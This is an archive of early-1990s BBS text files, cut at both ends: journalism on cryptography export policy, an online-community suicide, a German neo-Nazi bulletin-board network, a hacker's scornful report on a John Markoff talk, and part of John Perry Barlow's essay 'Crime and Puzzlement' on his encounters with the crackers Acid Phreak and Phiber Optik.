irony, when FBI Director William Sessions was forced to 
justify his stance against cryptography after giving opening 
remarks in which he called for stepped-up action to combat 
a rising tide of industrial espionage. Secure cryptography 
was designed to address such concerns.
	
   The emergence of the international marketplace is 
shaping much of the debate on cryptography. American 
firms say they can't compete under current policy, and that 
in fact, overseas firms are allowed to sell technology in 
America that American firms cannot export.
	
   "We have decided to do all further cryptographic develop
ment overseas,'' said Fred B. Cohen, a noted computer 
scientist. "This is because if we do it here, it's against the law 
to export it, but if we do it there, we can still import it and 
sell it here. What this seems to say is that they can have it, 
but I can't sell it to them _ or in other words _ they get the 
money from our research.''
	
   A spokeswoman for the the Software Publishers Associa
tion said that such export controls will cost $3-$5 billion in 
direct revenue if left in place over the next five years. She 
noted the Commerce Department estimate that each $1 
billion in direct revenue supports 20,000 jobs.
	
   The NSA denied any role in limiting the power of 
cryptographic schemes used by the domestic public, and 
said it approves 90 percent of cryptographic products 
referred to NSA by the Department of State for export 
licenses. The Commerce Department conducts its own 
reviews.
	
   But the agency conceded that its export approval figures 
refer only to products that use cryptology to authenticate a 
communication _ the electronic form of a signed business 
document _ rather than to provide privacy.
	
   The NSA, a Defense Department agency created by order 
of President Harry Truman to intercept and decode foreign 
communications, employs an army of 40,000 code-breakers. 
All of its work is done in secret, and it seldom responds to 
questions about its activities, so a large reserve of distrust 
exists in the technology community.
	
   NSA funding is drawn from the so-called "black budget,'' 
which the Defense Budget Project, a watchdog group, 
estimates at $16.3 billion for 1993.
	
   While the agency has always focused primarily on foreign 
espionage, its massive eavesdropping operation often pulls 
in innocent Americans, according to James Bamford, author 
of "The Puzzle Palace," a book focusing on the NSA's 
activities. Significant invasions of privacy occurred in the 
1960s and 1970s, Bamford said. 
	
   Much more recently, several computer network managers 
have acknowledged privately to the Chronicle that NSA has 
been given access to data transmitted on their networks _ 
without the knowledge of network users who may view the 
communications as private electronic mail.
	
   Electronic cryptology could block such interceptions of 
material circulating on regional networks or on Internet _ 
the massive international computer link.
	
   While proponents of the new technology concede the need 
for effective law enforcement, some question whether the 
espionage needs of the post-Cold War world justify the 
government's push to limit these electronic safeguards on 
privacy.
	
   "The real challenge is to get the people who can show 
harm to our national security by freeing up this technology 
to speak up and tell us what this harm is,'' said John 
Gillmore, one of the founders of Sun Microsystems. 
	
   "When the privacy of millions of people who have cellular 
telephones, when the integrity of our computer networks 
and our PCs against viruses are up for grabs here, I think the 
battleground is going to be counting up the harm and in the 
public policy debate trying to strike a balance.''
	
   But Vinton Cerf, one of the leading figures of the Internet 
community, urged that those criticizing national policy 
maintain perspective.
	
   "I want to ask you all to think a little bit before you totally 
damn parts of the United States government,'' he said. 
"Before you decide that some of the policies that in fact go 
against our grain and our natural desire for openness, before 
you decide those are completely wrong and unacceptable, I 
hope you'll give a little thought to the people who go out 
there and defend us in secret and do so at great risk.''


         The following article is from the Review Section of the New
         York Times of Sunday 26 August l990.

         It is headed:
         PROGRAMMED FOR LIFE AND DEATH, written by John Markoff.

         This spring a California man symbolically took his life by
         using a computer program to seek out and destroy the
         contributions he had made over to the years to a continuing
         electronic conversation run by a computer group called the
         Well. Several weeks later, he followed this "virtual"
         suicide by killing himself in the real world.

         Blair Newman had been one of the most active members of the
         Well, a five-year-old electronic community that is operated
         out of the Whole Earth Review, a publisher in Sausalito,
         Calif., with roots in the l960's counterculture. Several
         thousand people in the Bay Area regularly call up the Well
         for an electronics typewritten chat, and they frequently meet
         face to face in more conventional gatherings.

         Mr Newman, a 43-year-old veteran of the personal computer
         industry, was such an enthusiastic-- some would say
         obsessive--user of the Well that many of his friends knew
         him only electronically. They describe him as a flamboyant
         insomniac who could be counted on for stimulating and sometime
         infuriating late-night conversation. But he was also known
         for bouts of depression.

         After his simulated suicide in May, many members of the
         community dispatched angry messages complaining that they
         had been wronged. Some believed Mr Newman's writing, stored
         on a computer disk, were the property of the community and
         not his to destroy.

         It was after this dispute that Mr Newman took his life.

         "For him to be done in the virtual world was to be done--
         period," said John Perry Barlow, a participant in the group
         who is a lyricist for the Grateful Dead.

         Some may take Mr Newman's story as that of a disturbed
         computer addict who used technology to withdraw from the
         world. But others see the experience in a different light, as
         a glimpse of a future in which computers change the way
         people live and work, and ultimately the way they die.

         In recent years computer networks have been emerging as a new
         kind of community unlimited by geography. While members can
         be spread across the world, the ease of communication can
         engender an intimacy more akin to a small 19th-century
         village than a 20th-century suburb.

         Some sociologists see a dark side to all this.

         "There is a notion of avoiding the her-and-now society," said
         Todd Gitlin, a sociologist at the University of California at
         Berkley."Part of what's scary is that there is a blankness in
         her-and-now society that leads people to prefer these virtual
         communities."

         But others see the networks as a way to overcome the forced
         anonymity of modern life. While the telephone shrank the
         world by permitting instantaneous one-to-one contact, and
         while radio and television have served as a one-way medium to
         broadcast information to millions, the computer has become a
         vehicle that allows hundreds of people of like values and
         interests to come together in small groups.

         Much of what has taken place was foreshadowed in a number of
         science fiction novels written in the last 15 years. In his
         1981 novel "True Names" -- which has a small but devoted
         following among network enthusiasts--Vernor Vinge describes a
         fictional world in which a small computer underground
         illicitly occupies parts of a powerful global network. In the
         story, technology has become so advanced that it is possible
         to simulate highly realistic fantasy worlds and move about
         and interact with people who may be located thousands of
         miles away.

         A computer-science graduate student has recently created a
         less elaborate simulated universe called Tinymud, which
         exists within a nationwide computer network called Internet.
         A program permits dozens of people connected to the network
         through personal computers or work stations to create
         simulated personas and use them to explore a fantasy world
         that the players themselves recreate.

         Similasr to role-playing games lke Dungeons & Dragons, the
         game lacks the dazzling graphics associated with Mr Vinge's
         story. Tinymud's universe consists entirely of written
         descriptions, and wandering through it is like reading a
         novel-- or like being a character in one. And in a meta-
         fictional twist, each player can also play author, adding
         new regions for other players to explore.

         In recent months the game has become a fad on college
         campuses. By signing on to the network, one can travel
         through an interactive text filled with details of the
         geography of the Boston area, or electronically visit the
         Yale University campus.

         In addition to shrinking distances and stretching
         imaginations, computer networks also provide anonymity. Such
         an environment can lead to behavior that would not be readily
         tolerated in real life. Recently, in a posting on a computer
         network, a Wesleyan University student complained about
         sexual harassment in the Tinymud game.

         "Just because my character is female and has a vaguely
         attractive description, and just because I choose to flirt
         with some people, some jerk thinks my sexuality is public
         property," the student wrote. (It is not known whether the
         character's creator was male or female.)

         Some day electronic communities could be futuristic, high-tech
         paradises. But for now they function more as primitive
         societies, still groping for social codes.

         Mr Barlow, the lyricist, said he once believed that computer
         conferences would never become real communities until they
         could address sex and death in ritual terms.

         "Marriages and funerals are the binding ceremonies in real
         towns," he said, "but they have a hard time happening
         among the disembodied.

         In the case of Mr Newman, his friends have tried to assuage
         their grief what may be the first electronic funeral.
         Shortly after his death, they created a new computer file
         including all of his old writings, which it turns out, had
         been saved on a backup disk. They have also compiled a
         eulogy, hundreds of pages of testimonials available on the
         system. Included is this observation from Mitchell D. Kapor
         the founder of the Lotus Development Corporation and now
         chairman of On Technology.

         "He was a unique character, and perhaps the limitations of
         space and time were just too much for someone with so many
         ideas and inspirations."



X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

 Another file downloaded from:                               NIRVANAnet(tm)

 & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
 Rat Head                                 Ratsnatcher          510-524-3649
 Burn This Flag                           Zardoz               408-363-9766
 realitycheck                             Poindexter Fortran   415-567-7043
 Lies Unlimited                           Mick Freen           415-583-4102

   Specializing in conversations, obscure information, high explosives,
       arcane knowledge, political extremism, diversive sexuality,
       insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.

  Full access for first-time callers.  We don't want to know who you are,
   where you live, or what your phone number is. We are not Big Brother.

                          "Raw Data for Raw Nerves"

X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
Via NY Transfer News Collective * All the News that Doesn't Fit
 
    From: uc006@freenet.victoria.bc.ca (Michael Bakunin)
    
    Calgary Herald Feb 2/94
    
        Cyber-Nazis baffle German police
    
      BERLIN(AP)- A year-old computer network has become
    the communications backbone of Germany's Nazi scene, with users
    sharing ideas on how to rid the country of foreigners, co-ordinate
    illegal rallies and swap bomb-making recipes.
       The Thule Network, guarded by passwords and loyalty tests, 
    consists of at least a dozen bulletin boards in three western German
    states, law-enforcement officials and computer experts said. It is
    used by Nazis to avoid detection by police.
       The network's name derives from a  German secret society  
    that included many leading Nazis among its membership.
       With the network's aid, some 500 neo-Nazis formed a convoy
    that drove into the city of Fulda and rallied unhindered last year.
       But the Thule Network is much more than a place to look for         
      rides to rallies.
       Suppose some young Nazis want to put out a newspaper, for example,    
      but lack the know-how. Just plug into Resistance, one of the 
    network's bulletin boards. "A network-connected attorney can 
    check the text, a graphics office can put together the newspaper,"
    the Resistance host says in a digital preamble.
       The network is also a refuge- where a crowd closely watched by 
    police can disappear into cyberspace. Technologically ahead of most 
    police, network gatekeepers are having considerable success keeping 
    out the law.
       Not a single one has been prosecuted.
       "German police don't know much about computers and bulletin 
    boards. It's very new for them," said Uwe Kauss, editor of the 
    Munich-based computer magazine Chip, which has penetrated the network
    through informants.
       Chip estimates 1,500 of Germany's more than 40,000 Nazis are
    active on the network. Along with mobile phones and answering machines, 
    the Thule Network is helping a diverse Nazi scene establish a united
    front - a phenomenon acknowledged by Germany's government.
    
    --
    Autonomedia 
     618-620 View St.
     Victoria, BC  V8W 1J6
      Canada   email: uc006@freenet.victoria.bc.ca


              ----==== An -=RDT Special Report ====----
 
  
                   BCS Speech/Discussion by John Markoff,
   co-author of _Cyberpunk: Outlaws and Hackers on the Computer Frontier_

                                   or

                Weenie-fest '92: People Who Have No Clue





Special thanks to Craig Neidorf for informing me of this meeting...otherwise,
I would have missed it...


   "Boston Computer Society General Meeting, Wednesday, Jan. 22, 7:30pm.
    Katie Hafner, co-author with husband John Markoff of _Cyberpunk_, talks
    about computer ethics [ya, right] and computer crimes.  _Cyberpunk_ 
    details the stories of three computer hackers: Kevin Mitnick, an expert
    phone phreak, who carried his hacking to obsession [isn't that a perfume?]
    and addiction-wreaking havoc [holy SHIT!] with computer networks and 
    top-secret research; Pengo, from Germany, who penetrated US military
    computers and sold information to the Soviet Union; and Robert Morris, 
    a Harvard and Cornell graduate, who released a virus [WORM!] program that
    crippled thousands of computers on Internet.  This discussion may change
    how you think about computer accessibility [sure changed MY life..jeesh]."


   That's how the ad appeared in the Boston Computer Society's UPDATE mag
(w/o my bracketed snide comments, of course).  KL informed me of this meeting
via E-mail, and I read it the DAY it was happening.  I read about half of the
book _Cyberpunk_, and I know most of you have already checked it out.  Yes, it 
is a piece of shit.  A great deal of the info is *fabricated*, and the authors
attempt to explain hacking as a 'social disorder'...on par with juvenile 
delinquency.  True, a lot of hacking is just kids screwing around, but there is
MORE to the scene than just that.  What about the violation of civil liberties?
What about privacy on the nets?  What about the REAL DRIVE behind most of the
hacking going on today...the search for TECH KNOWLEDGE?  These things were NOT
covered adequately in the book.

   Seeing this meeting a GREAT opportunity to grill Ms. Hafner and to hear what
members of the BCS had to say, I attempted to quickly mobilize the entire RDT
crew into attending.  Alas, I was the *only* person able to make it.  "What the
hell," I figured, "I'm sure there'll be plenty of other people there who'll 
make the discussion lively and *heated*."  Boy, was I wrong...

   For starters, Ms. Hafner was unable to attend.  Instead, her husband and
co-author, John Markoff [Whackoff?] showed up.  I had never been to a BCS 
meeting before, and figured that the members would be relatively intelligent
about computers and computer ethics.  Well, about 80 ppl filled the lecture
hall, and ALL of them were older than me (I'm 24).  Looked like mostly yuppie
trash ("Gee, I just bought this 486...I wonder what it does..guess I'll join
the BCS!") and some old professor-types.  Suddenly, I felt a chill...
*Weenie-alert*  Two bozos behind me were trying to discuss how to write an
MS-DOS CONFIG.SYS file:

         "Bob, my computer is all messed up.  Doesn't work"
         "Gee, well, maybe you need one of those set device equals things!"

NOTE: ALL quotes are REAL...yes, truth is stranger than fiction...

   O well...Finally, John Markoff came onstage (BTW, he looks a lot like
Dustin Hoffman).  He started out by talking for 15 min on the definitions
of "hacker", "cracker", and "cyberpunk".  This is when my migrane started, a
small throbbing pulse in my left temple.  He discussed the origin of the term
"cyberpunk" and made MANY references to *BILL* Gibson.  Guess he wanted to 
stroke himself and make his 'personal' relationship with Gibson known to all.
Then, he talked in DETAIL about how HE figured out who set loose the Internet
worm.  "I told them to 'finger RTM'...and the name Robert T. Morris popped up."
Boy, some SERIOUS tech wizardry going on there.  Markoff patted himself on the
back for about 10 min more, and seemed proud of his dealings with Cliff Stoll
(he plugged _The Cuckoos Egg_ about 5 times).  Stroke, stroke, stroke...
He seemed really *proud* at having discovered all this info about the computer
underground (even tho his book is ONLY about *3* fucking case studies!!).

            "We wanted to get inside these cultures..."

   Well his book was basically just a REPORT of WHAT HAPPENED (not even 
factual half the time)...NOT about the CULTURE...NOT about what really made 
these people tick...NOT about what REALLY ATTRACTS ppl to the computer 
underground.  He was just a *reporter*, looking for a scoop.  Nothing more.

  After describing his book, he opened up the presentation to discussion.  The
FIRST question was by some BCS dork: 
 
        "Do you know anything about the printer-ROM virus used in the
         Iraqi computer systems?"  

Holy shit...I got a sick feeling in my stomach.  Markoff talked about this for 
10 min...with comments by other BCS members thrown in.  ARRRGH.  Anyway, the
NEXT question was a real winner:

         "What about those computers that took the Turing test recently..
          did they pass?  Could you explain what a Turing test is?"

Uh, yeah..ok, so maybe the BCS ppl *weren't* that up on things.  Maybe none of
them read the book.  Maybe none of them have ever read Phrack or 2600.  Maybe
*all* of them have their heads shoved up their butts?
   Finally, I made my move.  I asked him:

  "What do you think of the punishments given to convicted 'cyberpunks'?
   Do you think they're fair?  What about seizure of equipment w/out charges,
   taking examples from Operation Sundevil?"
   
  Markoff: "I think the government is just using scare tactics.  It's a shame
            that equipment is seized.  It's unconstitutional."

   Uh, that's IT?  Yep..that's all he had to say about it.  No comments on the
*police state* that's evolving on the nets.  Nothing about what's being done
to *protect* computer users' free speech.  Next question of mine:

      "What do you think really drives 'cyberpunks'...how 'serious' do you
       think the *crime* of *hacking* is?"

   Markoff: "It's just juvenile delinquency.  Most of it has nothing to do 
             with tech wizardry.  It's mostly con-artists.  I hope there's
             a 'fad element' to this cyberpunk thing.  Hopefully they'll 
             grow out of it."

  Yeah, this guy has his damn FINGER on the PULSE of the underground.  We're
just a bunch of delinquent, juvenile con-artists.  We'll grow out of it.  
Really.  Man, I was steamed.  What he said was full of *half-truths*..leaving
out IMPORTANT things, like the drive for exploration of highly complicated
networks and machinery...but I wasn't going to pick a fight with this guy..
I calmed down and asked the next question on my list:

     "What do you think of publications like Phrack and 2600?  How do you feel
      about the E911 bust that tried to suppress Phrack?"

 Markoff: "I don't buy their 'exploration' excuse.  I don't want people
           testing the locks on MY computer.  It's just juvenile delinquency."

  How insightful.  Completely ignored my question about the E911 affair.  So
much for understanding the underground.  Ya, we all read stuff like Phrack
and 2600 JUST so we can FUCK UP things.  

***ONE interesting thing he mentioned was that MOST hacker-related crimes are
INSIDE JOBS.  Trusted people working on the INSIDE.  Well, that was the ONLY
thing he said that I totally agreed with.  At least Markoff isn't trying to
start a 'Cyberpunk Witch-hunt'...not like OTHER people (Geraldo, Don I., etc.).

  This gets REAL funny now.  Other BCS members seemed to have NO interest in
talking about hacking/phreaking/civil liberties/hacker ethic/etc. ONE guy
asked:
            "Is piracy a big problem in the US?"

Another asked:
 
            "Do pirate bulletin boards still exist?"

Some *insightful* BCS member said:

        "Yeah, but it's dangerous.  Lawyers call up and check to see if you
         have copywrited software.  You can go to jail for it!"

    Markoff: "Yes, piracy is still rampant.  I can't give you any numbers 
              <cheesy smile here> but I know many exist."

BCS member responds:
           
            "You mean I can just call a number and get Pagemaker for free?"

  At this point, I vomited violently..at least my BRAIN did.  Many other inane
questions were asked, but I won't torture you further ("What about the 
IBM/Apple merger?"...that sort of thing).  I managed to get in
ONE LAST question:

     "What do you think of 'reformed cyberpunks'...for instance, the security
      consulting company 'Comsec' formed by ex-LOD members?"

  Markoff: "I think that any company that hires them should know what they're
            getting into.  I'm skeptical.  *I* wouldn't hire them."

  You should know that at this point MOST of the BCS dorks laughed out loud,
in annoying, weenie-like chuckles of mirth.  It took all of my strength not to
get up and crack skulls.  So much for intelligent discussions.  Actually, 
throughout MOST of the meeting, people were laughing for no apparent reason.
Guess they knew something *I* didn't?

   In the final analysis, the meeting confirmed my suspicions that Markoff is 
just a reporter trying to make a buck.  Cashing in on half-truths.  Not at all
interested in the 'cyberpunk's' point of view.  Not interested in the ETHICS 
and MORAL RAMIFICATIONS of hacker busts.  He's just reporting the "news".  At
least he wasn't trying to stir up a 'witch-hunt'...but then again, he isn't
contributing much to the awareness of the underground and what it "really" 
means...hacking is NOT a sickness...it is NOT something to 'grow out of'...
.it means freedom of speech...freedom to explore (to an extent..heh)..
and the DESIRE to explore...  MUCH more than juvenile delinquency.  I hope
*someone* writes a book from that perspective someday.

   I also got an insight into the BCS community.  Clueless.  Need I say more?


Hope you enjoyed this phile...look for more 'Special Reports' in the near 
future..
                          count0@world.std.com

           

               :   -=Restricted -=Data -=Transmissions    :
               :                                          :   
               : "Truth is cheap, but information costs." :



                  ..oooOO Count Zero OOooo.. -=RDTFrom: well!barlow@apple.com (John Perry Barlow)
Subject: Re:  Crime and Puzzlement


CRIME AND PUZZLEMENT
by

John Perry Barlow
barlow@well.sf.ca.us

Desperados of the DataSphere 

So me and my sidekick Howard,  we was sitting out in front of the 40 Rod 
Saloon one evening  when he all of a sudden says, "Lookee  here.  What do 
you reckon?"  I look up and there's these two strangers riding into town.  
They're young and got kind of a restless, bored way about 'em.  A person 
don't  need both eyes to see they mean trouble...

Well, that wasn't quite how it went.  Actually, Howard and I were 
floating blind as cave fish in the electronic barrens of the WELL, so 
the whole incident passed as words on a display screen:

Howard:	Interesting couple of newusers just signed on.  One calls himself 
	acid and the other's optik.

Barlow:	Hmmm.  What are their real names?

Howard:	Check their finger files.

And so I typed !finger acid.  Several seconds later the WELL's 
Sequent computer sent the following message to my Macintosh in 
Wyoming:  

	Login name: acid			In real life: Acid Phreak

By this, I knew that the WELL had a new resident and that his 
corporeal analog was supposedly called Acid Phreak.  Typing !finger 
optik yielded results of similar insufficiency, including the claim that 
someone, somewhere in the real world, was walking around calling 
himself Phiber Optik.  I doubted it.

However, associating these sparse data with the knowledge that the 
WELL was about to host a conference on computers and security 
rendered the conclusion that I had made my first sighting of genuine 
computer crackers.  As the arrival of an outlaw was a major event to 
the settlements of the Old West, so was the appearance of crackers 
cause for stir on the WELL.  

The WELL (or Whole Earth 'Lectronic Link) is an example of the 
latest thing in frontier villages, the computer bulletin board.  In this 
kind of small town, Main Street is a central minicomputer to which 
(in the case of the WELL) as many as 64 microcomputers may be 
connected at one time by phone lines and little blinking boxes called 
modems.  

In this silent world, all conversation is typed.  To enter it, one 
forsakes both body and place and becomes a thing of words alone.  
You can see what your neighbors are saying (or recently said), but 
not what either they or their physical surroundings look like.  Town 
meetings are continuous and discussions rage on everything from 
sexual kinks to depreciation schedules.  

There are thousands of these nodes in the United States, ranging from 
PC clone hamlets of a few users to mainframe metros like 
CompuServe, with its 550,000 subscribers.  They are used by 
corporations to transmit memoranda and spreadsheets, universities 
to disseminate research, and a multitude of factions, from apiarists to 
Zoroastrians, for purposes unique to each.

Whether by one telephonic tendril or millions, they are all connected 
to one another.  Collectively, they form what their inhabitants call the 
Net.  It extends across that immense region of electron states, 
microwaves, magnetic fields, light pulses and thought which sci-fi 
writer William Gibson named Cyberspace.  

Cyberspace, in its present condition, has a lot in common with the 
19th Century West.  It is vast, unmapped, culturally and legally 
ambiguous, verbally terse (unless you happen to be a court 
stenographer), hard to get around in, and up for grabs.  Large 
institutions already claim to own the place, but most of the actual 
natives are solitary and independent, sometimes to the point of 
sociopathy.  It is, of course, a perfect breeding ground for both 
outlaws and new ideas about liberty.

Recognizing this, Harper's Magazine decided in December, 1989 to 
hold one of its periodic Forums on the complex of issues surrounding 
computers, information, privacy, and electronic intrusion or 
"cracking."  Appropriately, they convened their conference in 
Cyberspace, using the WELL as the "site."

Harper's invited an odd lot of about 40 participants.  These included: 
Clifford Stoll, whose book The Cuckoo's Egg details his cunning efforts 
to nab a German cracker.  John Draper or "Cap'n Crunch," the grand-
daddy of crackers whose blue boxes got Wozniak and Jobs into 
consumer electronics.  Stewart Brand and Kevin Kelly of Whole Earth 
fame.  Steven Levy, who wrote the seminal Hackers.  A retired Army 
colonel named Dave Hughes.  Lee Felsenstein, who designed the 
Osborne computer and was once called the "Robespierre of 
computing."  A UNIX wizard and former hacker named Jeff 
Poskanzer.  There was also a score of aging techno-hippies, the 
crackers, and me.

What I was doing there was not precisely clear since I've spent most 
of my working years either pushing cows or song-mongering, but I at 
least brought to the situation a vivid knowledge of actual cow-towns,  
having lived in or around one most of my life. 

That and a kind of innocence about both the technology and morality 
of Cyberspace which was soon to pass into the confusion of 
knowledge.

At first, I was inclined toward sympathy with Acid 'n' Optik as well 
as their colleagues, Adelaide, Knight Lightning, Taran King, and 
Emmanuel.  I've always been more comfortable with outlaws than 
Republicans, despite having more certain credentials in the latter 
camp.  

But as the Harper's Forum mushroomed into a boom-town of ASCII 
text (the participants typing 110,000 words in 10 days), I began to 
wonder.  These kids were fractious, vulgar, immature, amoral, 
insulting, and too damned good at their work.  

Worse, they inducted a number of former kids like myself into 
Middle Age.  The long feared day had finally come when some 
gunsel would yank my beard and call me, too accurately, an old fart.  

Under ideal circumstances, the blind gropings of bulletin board 
discourse force a kind of Noh drama stylization on human commerce.  
Intemperate responses, or "flames" as they are called, are common 
even among conference participants who understand one another, 
which, it became immediately clear, the cyberpunks and techno-
hippies did not. 

My own initial enthusiasm for the crackers wilted under a steady 
barrage of typed testosterone.  I quickly remembered I didn't know 
much about who they were, what they did, or how they did it.  I also 
remembered stories about crackers working in league with the Mob, 
ripping off credit card numbers and getting paid for them in (stolen) 
computer equipment. 

And I remembered Kevin Mitnik.  Mitnik, now 25, recently served 
federal time for a variety of computer and telephone related crimes.  
Prior to incarceration, Mitnik was, by all accounts, a dangerous guy 
with a computer.  He disrupted phone company operations and 
arbitrarily disconnected the phones of celebrities.  Like the kid in 
Wargames, he broke into the North American Defense Command 
computer in Colorado Springs.  

Unlike the kid in Wargames, he is reputed to have made a practice of 
destroying and altering data. There is even the (perhaps apocryphal) 
story that he altered the credit information of his probation officer 
and other enemies.  Digital Equipment claimed that his depredations 
cost them more than $4 million in computer downtime and file 
rebuilding.  Eventually, he was turned in by a friend who, after 
careful observation, had decided he was "a menace to society."   

His spectre began to hang over the conference.  After several days of 
strained diplomacy, the discussion settled into a moral debate on the 
ethics of security and went critical. 

The techno-hippies were of the unanimous opinion that, in Dylan's 
words, one "must be honest to live outside the law."   But these 
young strangers apparently lived by no code save those with which 
they unlocked forbidden regions of the Net.  

They appeared to think that improperly secured systems deserved to 
be violated and, by extension, that unlocked houses ought to be 
robbed.  This latter built particular heat in me since I refuse, on 
philosophical grounds, to lock my house. 

Civility broke down.  We began to see exchanges like:

Dave Hughes:	Clifford Stoll said a wise thing that no one has 	
		commented on. That networks are 
		built on trust. If they aren't, they should be.


Acid Phreak:	Yeah. Sure.  And we should use the 'honor system' as a 
		first line of security against hack attempts.


Jef Poskanzer:	This guy down the street from me sometimes leaves his 
		back door unlocked. I told him about it once, but he still 
		does it.  If I had the chance to do it over, I would go in the 
		back door, shoot him, and take all his money and 	
		consumer electronics.  It's the only way to get through to 
		him.

Acid Phreak:	Jef Poskanker (Puss?  Canker?  yechh)  Anyway, now 
		when did you first start having these delusions where 
		computer hacking was even *remotely* similar to 	
		murder? 

Presented with such a terrifying amalgam of raw youth and apparent 
power, we fluttered like a flock of indignant Babbitts around the 
Status Quo, defending it heartily.  One former hacker howled to the 
Harper's editor in charge of the forum, "Do you or do you not have 
names and addresses for these criminals?"  Though they had 
committed no obvious crimes, he was ready to call the police.  

They finally got to me with:

Acid: 		Whoever said they'd leave the door open to their house... 
		where do you live?  (the address)  Leave it to me in mail if you 
		like.

I had never encountered anyone so apparently unworthy of my trust 
as these little nihilists.  They had me questioning a basic tenet, 
namely that the greatest security lies in vulnerability.  I decided it 
was time to put that principal to the test...  

Barlow:		Acid. My house is at 372 North Franklin Street in 	
		Pinedale, Wyoming. If you're heading north on Franklin, 
		you go about two blocks off the main drag before you run 
		into hay meadow on the left. I've got the last house before 
		the field. The computer is always on...

		And is that really what you mean? Are you merely just 
		the kind of little sneak that goes around looking for easy 
		places to violate? You disappoint me, pal. For all your 
		James Dean-On-Silicon rhetoric, you're not a cyberpunk. 
		You're just a punk.

Acid Phreak:	Mr. Barlow:  Thank you for posting all I need to get your 
		credit information and a whole lot more!  Now, who is to 
		blame?  ME for getting it or YOU for being such an idiot?!  
		I think this should just about sum things up.


Barlow:		Acid, if you've got a lesson to teach me, I hope it's not that 
		it's idiotic to trust one's fellow man. Life on those terms 
		would be endless and brutal. I'd try to tell you something 
		about conscience, but I'd sound like Father O'Flannigan 
		trying to reform the punk that's about to gutshoot him. 
		For no more reason that to watch him die.

		But actually, if you take it upon yourself to destroy my 
		credit, you might do me a favor. I've been looking for 
		something to put the brakes on my burgeoning	
		materialism.

I spent a day wondering whether I was dealing with another Kevin 
Mitnik before the other shoe dropped:

Barlow:		... With crackers like acid and optik, the issue is less 
		intelligence than alienation.  Trade their modems for 
		skateboards and only a slight conceptual shift would 
		occur.

Optik: 		You have some pair of balls comparing my talent with 
		that of a skateboarder.  Hmmm...  This was indeed boring, 
		but nonetheless:
	
At which point he downloaded my credit history.  

Optik had hacked the core of TRW, an institution which has made 
my business (and yours) their business, extracting from it an 
abbreviated ( and incorrect) version of my personal financial life.  
With this came the implication that he and Acid could and would 
revise it to my disadvantage if I didn't back off. 

I have since learned that while getting someone's TRW file is fairly 
trivial, changing it is not.  But at that time, my assessment of the 
crackers'  black skills was one of superstitious awe.  They were digital 
brujos  about to zombify my economic soul. 

To a middle-class American, one's credit rating has become nearly 
identical to his freedom.  It now appeared that I was dealing with 
someone who had both the means and desire to hoodoo mine, 
leaving me trapped in a life of wrinkled bills and money order 
queues.  Never again would I call the Sharper Image on a whim.

I've been in redneck bars wearing shoulder-length curls, police 
custody while on acid, and Harlem after midnight, but no one has 
ever put the spook in me quite as Phiber Optik did at that moment.  I 
realized that we had problems which exceeded the human 
conductivity of the WELL's bandwidth.  If someone were about to 
paralyze me with a spell, I wanted a more visceral sense of him than 
could fit through a modem.

I e-mailed him asking him to give me a phone call.  I told him I 
wouldn't insult his skills by giving him my phone number and, with 
the assurance conveyed by that challenge, I settled back and waited 
for the phone to ring.  Which, directly, it did.

In this conversation and the others that followed I encountered an 
intelligent, civilized, and surprisingly principled kid of 18 who 
sounded, and continues to sound, as though there's little harm in him 
to man or data.  His cracking impulses seemed purely exploratory, 
and I've begun to wonder if we wouldn't also regard spelunkers as 
desperate criminals if AT&T owned all the caves.

The terrifying poses which Optik and Acid had been striking on 
screen were a media-amplified example of a human adaptation I'd 
seen before: One becomes as he is beheld.  They were simply living up to 
what they thought we, and, more particularly, the editors of 
Harper's, expected of them.  Like the televised tears of disaster 
victims, their snarls adapted easily to mass distribution.  

Months later, Harper's took Optik, Acid and me to dinner at a 
Manhattan restaurant which, though very fancy, was appropriately 
Chinese.  Acid and Optik, as material beings, were well-scrubbed and  
fashionably-clad. They looked to be dangerous as ducks.  But, as 
Harper's and the rest of the media have discovered to their delight, 
the boys had developed distinctly showier personae for their rambles 
through the howling wilderness of Cyberspace.  

Glittering with spikes of binary chrome, they strode past the kleig 
lights and into the digital distance.  There they would be outlaws.  It 
was only a matter of time before they started to believe themselves as 
bad as they sounded.  And no time at all before everyone else did. 

In this, they were like another kid named Billy, many of whose feral 
deeds in the pre-civilized West were encouraged by the same dime 
novelist who chronicled them.  And like Tom Horn, they seemed to 
have some doubt as to which side of the law they were on.  Acid even 
expressed an ambition to work for the government someday, nabbing 
"terrorists and code abusers."  

There is also a frontier ambiguity to the "crimes" the crackers 
commit.  They are not exactly stealing VCR's.  Copying a text file 
from TRW doesn't deprive its owner of anything except 
informational exclusivity.  (Though it may said that information has 
monetary value only in proportion to its containment.)   

There was no question that they were making unauthorized use of 
data channels.  The night I met them, they left our restaurant table 
and disappeared into the phone booth for a long time.  I didn't see 
them marshalling quarters before they went.  

And, as I became less their adversary and more their scoutmaster, I 
began to get "conference calls" in which six or eight of them would 
crack pay phones all over New York and simultaneously land on my 
line in Wyoming.  These deft maneuvers made me think of sky-
diving stunts where large groups convene geometrically in free fall.  
In this case, the risk was largely legal.

Their other favorite risky business is the time-honored adolescent 
sport of trespassing.  They insist on going where they don't belong.  
But then teen-age boys have been proceeding uninvited since the 
dawn of human puberty.  It seems hard-wired.  The only innovation 
is in the new form of the forbidden zone the means of getting in it.  

In fact, like Kevin Mitnik, I broke into NORAD when I was 17.  A 
friend and I left a nearby "woodsie" (as rustic adolescent drunks 
were called in Colorado) and tried to get inside the Cheyenne 
Mountain.  The chrome-helmeted Air Force MP's held us for about 2 
hours before letting us go.  They weren't much older than us and 
knew exactly our level of national security threat.  Had we come 
cloaked in electronic mystery, their alert status certainly would have 
been higher.

Whence rises much of the anxiety.  Everything is so ill-defined.  How 
can you guess what lies in their hearts when you can't see their eyes?  
How can one be sure that, like Mitnik, they won't cross the line from 
trespassing into another adolescent pastime, vandalism?  And how 
can you be sure they pose no threat when you don't know what a 
threat might be?

And for the crackers some thrill is derived from the metamorphic 
vagueness of the laws themselves.  On the Net, their effects are 
unpredictable. One never knows when they'll bite. 

This is because most of the statutes invoked against the crackers were 
designed in a very different world from the one they explore.  For 
example, can unauthorized electronic access can be regarded as the 
ethical equivalent of old-fashioned trespass?  Like open range, the 
property boundaries of Cyberspace are hard to stake and harder still 
to defend.  

Is transmission through an otherwise unused data channel really 
